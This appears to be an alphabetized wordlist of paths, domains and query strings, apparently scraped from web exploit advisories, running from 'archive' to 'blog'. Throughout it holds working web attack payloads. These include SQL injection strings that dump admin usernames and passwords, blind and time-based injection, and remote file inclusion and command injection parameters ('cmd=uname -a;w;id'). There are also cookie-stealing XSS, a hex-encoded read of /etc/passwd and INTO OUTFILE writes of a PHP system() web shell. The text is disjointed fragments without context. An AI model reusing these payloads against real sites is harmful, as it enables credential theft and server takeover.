archive.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19
archive.php?m=[sql]
archive.php?y=[sql]
archiver-overview.php
archives
archivos_publicos
arch.php?arch=..
ardabiliec.ir
ardeacorephp
areas.php?action=single&AREA_ID=5%27[SQL-INJECTION]
$aRemoteHost$aRemotePath
$args{p}");}
/?[arguments]
arhiva.php?dir=..
ariadne
arias
aria-security.net
Aria-Security.net
Aria-Security.Net
Aria-Security.Net (Persian)
".$arnum.".php?cmd=".comd)
aroundme
aroundme_0_5_2.tar.tgz
arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
arsc
arsc3.3-pre2
art
artcat.php?cid=-1'+union+select+adminpass,2,adminn,4,5+from+mobilelib_admin
artedit
art-futura.w.interia.pl
article
article191-Tiki-Releases-8-4
article2
article-210607
article-2.htm
/?article=440
/?article=456
article-48.html
article59
Article-97
/?article.[ARTICLE_TITLE]
articleblock.php?articlecat=-1
articleblock.php&articlecat=[SQL]
article-category-list
article_cats.php?
article.class.php?system_path=[evil_scripts]
article.datatype.php?system_path=[evil_scripts]
article.download.php
article.download.php?artid=36106" 1
article.download.php?artid=36106%20and%20substring(@@version,1,1)=4
article.download.php?artid=36106%20and%20substring(@@version,1,1)=5
article-engine
article_import
article-management-script.php
article-manager.html
articlems_2_1_2
article_new.php?lang=
article_overview.php?path= [inj3ct0r sh3ll]
article.php
article.php?aid=[ARTICLE ID]
article.php?aid=[ARTICLE ID]&comment=new
article.php?articleid=111'
article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11--
article.php?article_id=[SQL]
article.php?cat=[SQL] 
article.php?es_id=11[CODE]
article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12
article.php?id='
article.php?id="
article.php?id=009 1 -u \n";
article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
article.php?id=1 --dump --tables
article.php?id='59
article.php?id=59 union select 1--  (SQL)
article.php?id=9999+and+1=2+union+all+select+version(),2--
article.php?id_article=7[SQLI]
article.php?ide=[shell]
article.php?id=[SQL]
article.php?id=[SQLi]
article.php?id=[SQL Injection]
article.php?id=XX
article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7--
article.php?path= [inj3ct0r sh3ll]
article.php?save=1&sid=20&cookieusrtime=160000&user=USERID:encodedstring
article.php?sid="><Img Src=javascript:alert(document.cookie)><Img Src="
article.php?sid=[sql]
article.php?story_id=1[SQL] 
article.php?storyid=4540
article.php?storyid=6284
article.php?template= [inj3ct0r sh3ll]
articles
articles -->Article Manager -->Price: $99 USD
article_script
article_script.php
articlesdetails.php?id=[sqli]
articlesdetails.php?id=[sqli] 
ArticleSetup
articles.php
articles.php?aid=0ebd6f54040890e8&action=edit&article_id=123" method="post">
articles.php?aid=0ebd6f54040890e8" method="post">
articles.php?aIDS=-1+union+select+1,2,user()--
articles.php?A=ViewArticles&cat=1[SQL]
articles.php?cat=1[SQL]
articles.php?do=viewart&id=%00&cat=[file name]%00   #
articles.php?id='+union+select+1,concat(username,0x3a,password)
articles.php?_PX_config[manager_path]=..
articles_show.html?articles_id=release-notes
article_suppr.php?id=4
article_suppr.php?id=[id_article]
articlesuspend.php
articletextonly.php?kqid=-9999
articletext.php?kqid=-999
article_update.php?lang=
article-v2.2.rar
articleview
article_view_photo.php?id=-999%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20ecsusers%20limit%200,1--
ArticleView.php?article_id=[SQL]
articulo.php?id_articulo=-1+[SQL]
ArtifactBoxOptions.class.php?gfcommon=[Shell]
ArtifactCanned.class.php?gfcommon=[Shell]
Artifact.class.php?gfcommon=[Shell]
ArtifactExtraField.class.php?gfcommon=[Shell]
ArtifactExtraFieldElement.class.php?gfcommon=[Shell]
ArtifactFactory.class.php?gfcommon=[Shell]
ArtifactFile.class.php?gfcommon=[Shell]
ArtifactFileHtml.class.php?gfcommon=[Shell]
ArtifactFromID.class.php?gfcommon=[Shell]
ArtifactHistory.class.php?gfcommon=[Shell]
ArtifactHtml.class.php?gfcommon=[Shell]
ArtifactHtmlSearchRenderer.class.php?gfwww=[Shell]
ArtifactMessage.class.php?gfcommon=[Shell]
ArtifactQuery.class.php?gfcommon=[Shell]
ArtifactQueryFactory.class.php?gfcommon=[Shell]
Artifacts.class.php?gfcommon=[Shell]
ArtifactSearchEngine.class.php?gfwww=[Shell]
ArtifactSearchQuery.class.php?gfcommon=[Shell]
ArtifactsForUser.class.php?gfcommon=[Shell]
ArtifactType.class.php?gfcommon=[Shell]
ArtifactTypeFactory.class.php?gfcommon=[Shell]
ArtifactTypes.class.php?gfcommon=[Shell]
artis.imag.fr
artist_gallery
Artists
artists.php?theme=..
artmedic-phpscripts.de
artmedic_print.php?date=..
artmedic_weblog
art.php?artid="><script>alert(
art.php?ID=172
artsys
as
asaancart
asaancart%20v-0.9
asaher_pro1.0.2
asc?&cmd=uname%20-a;w;id;pwd
asc?&cmd=uname%20-a;w;id;pwd;ps
asc?&cmd=uname%20-a;w;id;pwd;ps 
ascii.php
ascii(substring((select
ascii(substring((SELECT
ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1
ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."
a><script>alert('lol')<
asdsadfas 
asdsadfas%20"><[PERSISTENT INJECTED SCRIPT CODE]"="" "="" 
asearch.php?site=search&table=user&
asedownloads
ASelectAuthPlugin.class.php?gfplugins=[Shell]
aselectextauth
aselectextauth-init.php?gfplugins=[Shell]
ashheadlines.php?pathtoashnews=[evil_scripts]
ashiyane.org
Ashiyane.org
[ashnews_path]
ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)<
ashnews.php?pathtoashnews=[evil_scripts]
ashop
asianeagle.to.md
asia_pol00.jpg
asicms.sourceforge.net
asistente
ask
askme.htm
askpert
asp
aspekt-ratio
AspFootballPool
ASP-NET
aspprocatalog.sourceforge.net
aspProductCatalog
aspx
asria.info
asset
assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]
assetman
~assetman
assetmanager
asset-manager
assetmanager.asp?ffilter=<
assetmanager.asp?ffilter=">
assetmanager.php (2 upload Ev!l)
asset.php?ID=2+[SQL-INJECTION!]--%20-
assets
asset_type.php?ID=5+[SQL-INJECTION!]--%20-
AssignDomainPage.class.php?base_path=[evil_scripts]
AssignHostingPage.class.php?base_path=[evil_scripts]
assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher--
AssignProductPage.class.php?base_path=[evil_scripts]
assistan.php?gfplugins=[Shell]
assistant_edit_handler.php?gfplugins=[Shell]
assistant_edit.php?gfplugins=[Shell]
assistenza
association.class.php??path_om=[Shell]
Association.php?_ENV[asicms][path]=
assurance.class.php?path_om=[Shell]
AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
astatspro.joom.la
asteam.org)   #
asteam.org)\n";
asterisk
astium-downloaden-en-installeren
AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
A-Study-in-Bots-Bitbot.shtml
atacante
atacate
Atacke
atackweeb.cl
ataturk.php?page=[sheLL]
athenareg.php?pass=%20;whoami 
a&titre=a&descript=+a+&categorie=G%E9n%E9ral&Submit=Gonder
atom
atomicboard
AtomicBoard-0.6.2
atomicpa.sourceforge.net
atomphotoblog
a-to-z-category-listing
Attach
AttachManager.class.php?gfwww=[Shell]
attachment.php 
attachment.php?attachmentid=16341&d=1126191996 |
attachment.php?attachmentid=252224&d=1211197439
attachment.php?attachmentid=354606&d=1237376300
attachment.php?attachmentid=519880&d=1285278011
attachment.php?attachmentid=72765&d=1157806602                             
attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h
attachment.php?filename=.
attachment.php?s=464133a8cff5c8539cd31d913a6d0287&attachmentid=2775&d=1108305980
attachment.php?s=622750d4b01903b754e83a135c44d8cc&attachmentid=779&d=1253949289
attachments
attachments.php?file=..
attachmentupload.php?id=1&tableName='<script>alert(document.cookie)<
attach.php?id=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '
attach.php.pps?cmd=ls%20-la
attachs.php?path_faqe=[INDONESIANCODER]
[attacked_box]
attacker
' + attacker
' + attacker + '
'+ attacker +'
[attacker]
[ATTACKER]
[attacker]&cahier=1&art=1
attackerhost
attacker_host:4321
""" + attacker_ip + """
attacker_ip
attacker.org
attacker.org 
attacker.php
attackerScript.php
ATTACKER_SERVER
[attacker]&SESSION=.
[attacker's_host]
attackersite
<attacker_site>
attacker.site
attackersite.tld
attackerSpecified.html')">
[attacker's_script] 
attackers.server
[attacker's_site]
attacker's site
attackers-webserver
attackerswebsite
attacker&THEME_DIR=
attacker.tld
[attacker_url] 
attacker_username
[attacker] will
attack.htm"%20marginWidth=0%20marginHeight=0%20fr
attack.html height=1 width=1 style=visibility: hidden; 
Attack_Secure
[attack url]
attact
attcker
[attcker]
attributes
attributes.php?donsimg_base_path=[SHELL]
atutor
ATutor
atutor.ca
atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.
auciton_software
auction
auction_2008
auction_confirmation.inc.php?include_path=[darkcode]		[»]
auction_demo
auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=4 << false
auction_details.php?prodid=72+AND+SUBSTRING(@@version,1,1)=5 << true
auction_offer.php?mode=add&ar=' 
auction.php
auction_rating.php?mode=view&u=' 
auction_room.php?ar=[num][sql]
auction_room.php?order=price_asc&ar=[num][sql]
auctionsearch.php?advsrc="<script>alert(
auctionsoftware
auction_software
Auction_Software
auction_store.php?mode=store&u=[num][sql]
auction_web2.0
audi
audio
audio_admin.php?type=a (2 upload audio) Use Tamper Data
audio_and_video_script.html
audio-broadcasting
audios
Audio&VideoLibrary
audistat
audit
Audit
audits
Audits
audyt_bezpieczenstwa_652.html
audyt_bezpieczenstwa_677.html
audyt_bezpieczenstwa_692.html
audyt_bezpieczenstwa_728.html
audyt_bezpieczenstwa_729.html 
audyt_bezpieczenstwa_746.html
aufbau
Aug
august
auktion
auktion3
auktion-e
auktion.php?id_auk=
auktion.php?id_auk=1+and+1=1+and+ascii
auktionscript
auktionshaus
auktion_text.php?id_auk=
auktion_text.php?id_auk=1+and+1=1+and+
[aura]
AuraCMS
auracms15
AuraCMS1.5
auracms162
auracms2.1
auracms.org
auracms.x.x
aurora
aurora_1.0.2
autentificarse.php
auth
Auth
/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=3Dma%60il
authenticate
authenticate.php?db_driver=..
authentication_bypass_in_phpliteradmin.html
authentication_bypass_in_phpmysport.html
authentication_nav.inc.php
authent.php4?rootpath=Http:
auth_func.php
auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
author
 author author 5
authoredit.php?id=%27
authorid=1
authorization.xml
authorizeaim
authorizeaim.class.php?base_path=[evil_scripts]
authorphoto
author.php?ID=5' (MySQLi Found)
author_pics
authors
    ___________________________Author:Sid3^effects_________________________________
_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
authors.php
authors.php?id=-999+UNION+SELECT+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users
authorurl>
authorUrl>
authphp
auth.php
auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
auth.php?cid=' 
auth.php?config[General][shop_closed]=Y&shop_closed_file=..
auth.php?GLOBALS[pie][library_path]=[evilcode]
auth.php?id=1320
auth.php?id=1539
auth.php?m='%20;%20AND%20THIS=VULN
auth.php?m=all'%20;%20AND%20THIS=VULN
auth-settings.php
auth_user_md5
auth_user_md5--
auth_user_md5 -- aaa
Auto1
auto2
auto_2010-04-27_14-29.sql
auto_admin_settings_tb
Auto.asp
auto-attachments
Auto_Classifieds
auto_classifieds_1
autocms
autocomplete.php?field='%3C?php%20system($_GET[%22CMD%22]);%20?%3E'%20FROM%20dual%20INTO%20OUTFILE%20'..
autoconfig.dd
autodealerscms.php
auto_details.php?id=sql
autoexec.bat
autoexec.bat%00
autoexec.bat%00&kategorie=Tutorial
autoexec.bat%00&page_id=106
autoexec.bat%00&page=params&id=8
autohtml.php?op=modload&mainfile=x&name=filename 
autohtml.php?op=modload&name=..
autoindex.sourceforge.net
autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=
autoinstallhome.php?app=Joomla_1.5
autonline.zanfi.nl
autoportal10
autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL]
autopublish.php?GLOBALS[g_campsiteDir]=[SHELL]
autoreminder
autoresponderhosting
autoresponderhosting.php
autori
autorisation.class.php?path_om=[Shell]
autorisation_normale.class.php?path_om=[Shell]
autorisation_unique.class.php?path_om=[Shell]
autor.php?id_autor=-1+[SQL]
autor.php?id=' union select 1,2,3,4,5,@@version,7,8,9 '
autos
autos.html
autositephp
AutoStand_Category.html
auxpage.php?page=..
availability.php?gfplugins=[Shell]
available
avarcade
avatar
[avatar_md5_name].jpg?cmd=ls -la%00
avatar.php?action=backup
avatar.php?action=readfolder
avatar.php?action=view
avatar.php?pmc_password=%22%3E%3Cscript%3Ealert%280%29%3C
avatars
Avatars
avatar_[user_id].jpeg%00&cmd=ls%20-la
avatar_[username].jpeg&cmd=ls%20-la
avatar[YOURUSERID].EXTENSION
ava_upl2.php
ava_upl.php
avc.x.philipwette.de
a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200
avi.lib.cas.cz
avis.class.php?path_om=[Shell]
aviso.php?codigo=1 and 1=1 <= TRUE
aviso.php?codigo=1 and 1=2 <= FALSE
aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
aviso.php?codigo=[BLIND]
[avlc_path]
 avril st_\n";
avtutorial
awards.add-edit.php
awardsList.inc.php
awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
awards.php?idfestival=7 (SQL)
awaylist
awb
awcm
awcm.sourceforge.net
awcm v2.1 final
awd_song
aWebNews
awiki
awrate
awse
awse_admin
"."awstatstotals.php?sort=%22%5d%2epassthru%28%27".$cmd."%27%29%2eexit%28%29%2e%24a%5b%22";
"."awstatstotals.php?sort=%7b%24%7bpassthru%28".$cmd."%29%7d%7d%7b%24%7bexit%28%29%7d%7d";
awzmb
axdcms
axdcms-0.1.1
axiompng
axis
axis-0.7.0.4
axis2
axis2-admin
axis2.xml
axis2.xml)
axiscommerce
ayarlar
ayar='SiFre [*][*]
aysad.net
ayuda
az
[a-zA-Z]+)?(\
[a-zA-Z](\.php)
azdlite
azimyt
azimyt.net
azucarcms
b
 -b
_b
b>
b><
b>'),
B>
b0f.ir]
b0rizq.by.ru
b1gbb
b2
b2bportal_script.html
b2b-trading-portal.php
b2c
<b2epath>
b2epms
b2evo
b2evo_captcha_tmp
b2evolution-4-1-7-and-5-0-3
b2evolution.net
b%3E%3Cp%3E%3Cinput%20type=password%20name=pass%3E%3
b50f9cbff100ae4e8a581a9f1a8shell.php
B5n9O
babb
BaBB%202.8
BaBB%20Full
babygekko
baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html
babygekko-v1-2-4-has-been-released.html
back
backdoor
Backdoor
backdoor_block.php
 backdoored, just type your choise:
backdoored.net\n"
backdoored.net    Visit Us\n"
".$backdoorname."?cmd=ls -la\n\n";
backdoor.php?cmd=%s" % (rhost,rcmd))
backdoor.php?e=phpinfo();
backdrphpext
backend
[Back-End_path]
backend.php
backend.php<
backend.php CLASS=NOIR>www.votre_site
backend.php?op=category&cat=0+UNION+SELECT+password+FROM+
backend.php?op=category&cat=0+UNION+SELECT+@@version%23
backendpopup
[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version(),3,4,5,6,7,8,9,0
[backlinkspider_page_name].php?cat_id=[SQL]
backoffice
backup
BackUp
backup_2004-08-17_1845.sql
backup-2012_10_07-19_20_15.zdb
backup-database.php
backup_db.php
backupdb.php
backup_gwnew_users.sql
backup_gwnew_users.sql && cat backup_gwnew_users.sql
backup.gz
backup.log*
backup.log exists.
backup.php
backup_phpboost_11-03-29-17-35-34.sql
backup.php?export=1
backup.php?lang=
backup.php?path_faqe=[INDONESIANCODER]
backup_phpwebquest.php
backups
backup_[sitname]_*Y*M*D*H*Mn*S*.sql
backups.php?deleteall" alt="Do you see this?" 
backup.sql
backup.sql"
backup-sql.php">
backup.sql <-=- You Can See The backup Code From Here
backup_timeout.php?lang=
baconmap
baconmap.nmsu.edu
bacula
bacula-web
bacula-web.dflc.ch
bademails.php?c=system(dir);
bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A
bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A
bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A
badfile
bad_host 
bad.js><
[badscript]?
bad.site
badwords.php?path_faqe=[INDONESIANCODER]
bajarArchivo.php?qs=" + s
bakery.cakephp.org
balance.inc.php?install_root=[Shell]
balance_sheet.php
ban
bananadance-wiki.127.0.0.1:1339
bandsitecms
bandwebsite
bandwebsite.php
bandwebsite.php 
bank
bank_account_reconcile.php
bank.example
bank_inquiry.php
bank.php
bank-v3
banned.php?VL_include_path=[SHELLCODE]
bannedusers.php
bannedusers.php?action=process">
banner1.php
banner-ads-management-script-features.php
bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin--
bannerclick.php?bnnnerid=11 [ SQL i ]
banner-details.php?id=-32'+UNION SELECT 1,2,3,concat(@@version,0x3a,user(),0x3a,database()),5,6,7,CHAR(83, 110, 97, 107, 101, 115, 84, 101, 97, 77)
banner-exchange
banner-exchange-script-p-367.html
bannermanagementscript.asp
bannermanagementscript.php
bannermanager #
banner_manager.php
banner_manager.php?action=new (OR)
bannermanagerpro
banner.php and try this:
banner.php?categoryID=-2'+union+select+1,version(),3,4,5,6,7--+
banners
banners.php?op=Change&cid=-1&bid=100&url=HTTP:
banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path
banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c:
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'
banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path
banner-upload.php =>up u Ev!l
banniere
banniere.php
banniere.php 
banniere.php?id_article=7[SQLI]
ban.php?reson=<script>alert(123);<
barbeuzweb.free.fr
barbo91_uploads
[barcodegen.1d-v2.0.0]
barcode.php
barcode.php?code=012$PATH$d
barcode.php?code=`tail%20-1%20
barcode.php?code=%TMP%
barcode.php?code=`uname%20-a`
barenuked
barman
Barman-0.0.1r3.tgz
barnraiser_01
barrel
barry
barryvancompo
base
#{base}
basebuilder
basebuilder.sourceforge.net
base-dir
base_graph_main.php?back="><script>alert("780")<
base.inc.php%00
base.ini.php?x=phpinfo%28%29;
base_main.php
base.php?BaseCfg[BaseDir]=[shell]
base.php?page=forum
base.php?page=gestion_membre.php&var=profil&user_id=-9999999'
base.php?page=membres.php&mt="
base.php?page=site
base_qry_alert.php?submit=<script>780<
base_qry_main.php
base_qry_main.php'
base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DBt_view=-1&sort_order=time_d&time[0][0]=1=1) LIMIT 1--+&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics
base_qry_main.php?clear_allcriteria=1&num_result_rows=-1&submit=Query+DBt_view=-1&sort_order=time_d&time[0][0]=<script>alert(document.cookie)<
base_qry_main.php?new=1&num_result_rows=-1&sensor=SQL_INJECTION&submit=Query
base_qry_main.php?new=1&sig[0]=%3D&sig[1]=[SQL]&submit=Query+DB
base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DBt_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20)%20AND%20(SELECT%208543%20FROM(SELECT%20COUNT(*),CONCAT(0x3a796d723a,(MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,50)),0x3a6479783a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(5635=5635
base_qry_main.php?new=2&num_result_rows=-1&submit=Query%20DBt_view=-1&ip_addr_cnt=1&ip_addr[0][0]=%20&ip_addr[0][1]=ip_dst&ip_addr[0][2]==&ip_addr[0][3]=11.11.11.11&ip_addr[0][8]=%20&ip_addr[0][9]=%20<SQLi HERE>
base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time
base.secureideas.net
base-snort
base_stat_alerts.php?current_view=-1
base_stat_alerts.php?current_view=-1&layer4=TCP&num_result_rows=-1&sort_order=occur_d
base_stat_alerts.php?ossim
base_stat_ipaddr.php?ip=1.1.1.1&netmask="><script>alert("780")<
base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]==
 base url
' . $base_url }
bash;&pdf=make
basic
[basiccms_path]
basicextension.class.php?system_path=[evil_scripts]
basic_footer.php?theme_dir=..
basic_header.php?theme_dir=..
Basilic
basilix
[BasiliX_path]
basilix.php3?request_id[DUMMY]=..
basket.php?action=addex&id=[SQL]
basket.php?action=addr&id=[SQL]
basket.php?action=[SQL]
bas.php?modulename=..
bastardlabs
bastardlabs.info
batch
bate_papo
battlescrypt.html
baustelle.gif" not in src:
bazar
bb
bb1_users
bb427
bbclone_tools
 bbcode.php?l=
bbcode.php?lng=[EV!L]
bbcode.php" method="post">
bbcodes.php?aid=693ec1754cc0b042
bbcodes.php?aid=c37dd1f4ea5686c5&enable=%00war'axe
" -b "blah=blah; cs_lang=..
bb_lib
bbpress
b><br 
bb_recipe.admin.php
bbrss.php?phpbb_root_path=Command*Shell
bbs
bbs88.rar
bbScript admin
bbs.lib.inc.php?site_path=evilthingg0ezhere
bb_smilies.php?bgcolor1=">[SCRIPT]
bb_smilies.php?Default_Theme=[SCRIPT]
bb_smilies.php?name=..
bb_smilies.php?name=[SCRIPT]
bb_smilies.php?site_font=}--><
 BBS website, with
bbs.wolvez.org
bbxca
bbzl092
bc
BC%20Web%20Firewall%20660%20v7.3.1.007%20-%20Input%20Validation%20Vulnerability
 || !$bcmd){usage()}
bcoos
bcoos 10\n";
be2004-2
beacon
beamospetition
Beautifier
becommunity
BE_config.php?_PSL[classdir]=[evil_scripts]
becontent
bedita-app
beehive
beer-recipes-plugin
beerXMLparser
beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users
beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users";
beerxml.php?r=[SQLi]
begin.inc.php?_OPENDB_THEME=[LFI%00]
bekas.6te.net
b-elektro.no
 ~ believe in full disclosure
belive
belnet.dl.sourceforge.net
bemarket
berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--
[berylium2_path]
berylium.org
Beslan%202005
b> est : <b>([^<]+)<
beta.basilix.org
beta?force=download
betmore
better-wp-security
bf
bg.gif">
bi
bibciter.net
bibciter.sourceforge.net
bib_form.php?CLASSPATH=[AvriLhea]     
bible
bible.class.php?path_om=[Shell]
biblioteca
biborb
bib_pldetails.php?CLASSPATH=[AvriLhea]        
bib_plform.php?CLASSPATH=[AvriLhea]                
bib_plsearchc.php?CLASSPATH=[AvriLhea]                
bib_plsearchs.php?CLASSPATH=[AvriLhea]                
bib_save.php?CLASSPATH=[AvriLhea]                
bib_searchc.php?CLASSPATH=[AvriLhea]                
bib_searchs.php?CLASSPATH=[AvriLhea]                
bid
/?bid=1\r\n";
/?bid=1 see the hash"
/?bid=2
/?bid=2&tid=1
bidhistory.asp?ItemID=354%20and%201=0
bidhistory.asp?ItemID=354%20and%201=1
bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
bif3-0.4.1.tgz
big%3E
big%3E%3C
Big%3E%3C
bigace
[Bigace]
BIGACE-2.6.html				      |
bigace-2.7.5.html
bigacecms
big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
big.asp?id=  [SQL Inject]
bigforum%205.2
BigMath.php?_ENV[asicms][path]=
bignophoto.gif
big.php?pathtotemplate=[Evil Script]
bigshow.php?id=[url of an image]'>[code]
bigtreecms
BigTree-CMS
 - BigTree CMS is an open source content management system built on PHP and MySQL.
bilboblog
bilboblog-version-021-english-translation
bild-bearbeiten.de
bilder-upload-script
bilder-upload-script_1.09.rar
billing
BillingPage.class.php?base_path=[evil_scripts]
BillingPaymentPage.class.php?base_path=[evil_scripts]
bin
Bin
binarydigit.at
binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
bingo&feid=filenameid
bingophp.free.fr
bio-img.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
biorhythm.php
bismarck
bit.ly
bittorrent_module
bitweaver
bitweaver2.8.1
bitweaver to address the above issues.
BiyoSecurityTeam
biz
biznetnetworks.dl.sourceforge.net
bizon-cms-demo
bizweb.styleware.eu
blab50lite
blackdot.be
blackh.eu
blackh.eu               |
black-hg.org
/?blacklisted=1&change=Vai&find=&findby=email&id=0&page=users&sortorder=desc&start=0&unconfirmed=1&sortby=1[SQL Injection Point]
BlackList.Examine.class.php?_CONF[path]=[Evil_Script]
blackorange.php?root=shell
blackpentesters.blogspot.in
blackshell.pl
bladecenter
[BLADECENTER]
bladir
blah
blah.php"
blah.php?u=5 -blind u -sql \"user()\"\n";
blanc
blank.gif' 
blank.gif"
blanko.preview.php?nmf=
blank.php?env_dir=shell
blank.php?script_root=shell
blend_common.php?phpbb_root_path=[FILE]
blend_data
bleu
blind-sql-injection
blob
block-Calendar1.php
block-Calendar_center.php
block-Calendar.php
blocked.php">
blocked.php?id=1&history=-2&u=%27
block_media
block_module.php?modul=[EV!L]
block.php?selected_provider=[LFI]%00
blocks
blocks-edit.php?preview=1&name=..
blocks.php
blocks.php?mydirpath=DSecRG
block.tag.php?GLOBALS[PTH][classes]=[include]
blocnote.class.php?path_om=[Shell]
blog
blog<
blog";
blog)
Blog
*&blog=1
_blogadata
blogAdmin
blogblaster
blogblaster.php
*&blog=[blog_id]
blogbuddies
blog.duslerim.net
blog_exec.php?action=remove_blog&blogid=<script>alert(document.cookie);<
blogger.particlesoft.net
blogger.php
bloggeruniverse
bloggeruniverse-beta2
blogging.webspot.co.uk
*&blogId=0"
*&blogId=0";
*&blogId=1
/?BlogId='"><script>alert(document.cookie)<
blogink
blogink.sourceforge.net
BlogIt!
blog.malerisch.net
blogman
]+)(.*)$!', $BLOG, $match)) {
Blog.mdb
[BlogMe_path]
blogmod
BlogModel.php?path=
blog?msg=[SQL] 
blog\n";
blog.nibblesec.org
[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user
[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
[blogpath]
blog_path
blogphp
blog.php
blog.php?file=..
blog.php?id=
blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users
blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users
blog.php\r\n";
blogphpscript
blog.php?template= [inj3ct0r sh3ll]
blog.php?user=admin&month2=4&year2=aaaaaaaaaaaaa
blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins
blogphp_users
